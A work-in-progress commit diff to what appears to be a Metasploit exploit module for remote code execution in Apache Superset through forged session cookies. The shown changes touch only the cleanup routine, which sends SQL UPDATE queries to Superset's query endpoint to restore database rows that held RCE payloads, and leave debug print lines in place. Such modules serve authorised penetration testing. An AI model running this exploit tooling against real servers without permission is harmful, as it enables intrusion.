still working on resetting values

modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb

@@ -545,15 +545,25 @@ def exploit
   def cleanup
     super
 
-    # We didn't know the previous values, so just blank out
+    # We didn't know the previous values, so just blank out XXX
     unless (@client_id.nil? || @csrf_token.nil? || @db_id.nil? || @values_to_reset.nil?)
-      print_status('Unsetting RCE Payload')
+      print_status('Unsetting RCE Payloads')
       @values_to_reset.each do |row|
         next if row[0] == 'id' # headers
+        vprint_status("Restoring row ID #{row[0]}")
 
         set_query_latest_query_id
-        puts row[0]
-        puts row[1]
+        is_binary = false
+        if (row[1].starts_with?("b'") && row[1].ends_with?("'"))
+          row[1] = row[1][2..-2] # remove encoding and substring marks
+          row[1] = Rex::Text.to_hex(row[1])
+          row[1] = row[1].gsub('\x', '') # we only need a beginning \x not every character for this format
+          is_binary=true
+
+          puts row[1]
+          puts "UPDATE key_value set value=#{is_binary ? 'X' : ''}'#{row[1]}' where id='#{row[0]}';"
+        end
+
         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'superset', 'sql_json/'),
           'method' => 'POST',
@@ -570,7 +580,7 @@ def cleanup
             'json' => true,
             'runAsync' => false,
             'schema' => 'main',
-            'sql' => "UPDATE key_value set value='#{row[1]}' where id='#{row[0]}';",
+            'sql' => "UPDATE key_value set value=#{is_binary ? 'X' : ''}'#{row[1]}' where id='#{row[0]}';",
             'sql_editor_id' => '1',
             'tab' => 'Untitled Query 1',
             'tmp_table_name' => '',
@@ -580,6 +590,11 @@ def cleanup
             'expand_data' => true
           }.to_json
         )
+        if res && res.code == 200
+          vprint_good('Successfully restored')
+        else
+          vprint_bad("Unable to reset value: #{row[1]}")
+        end
       end
     end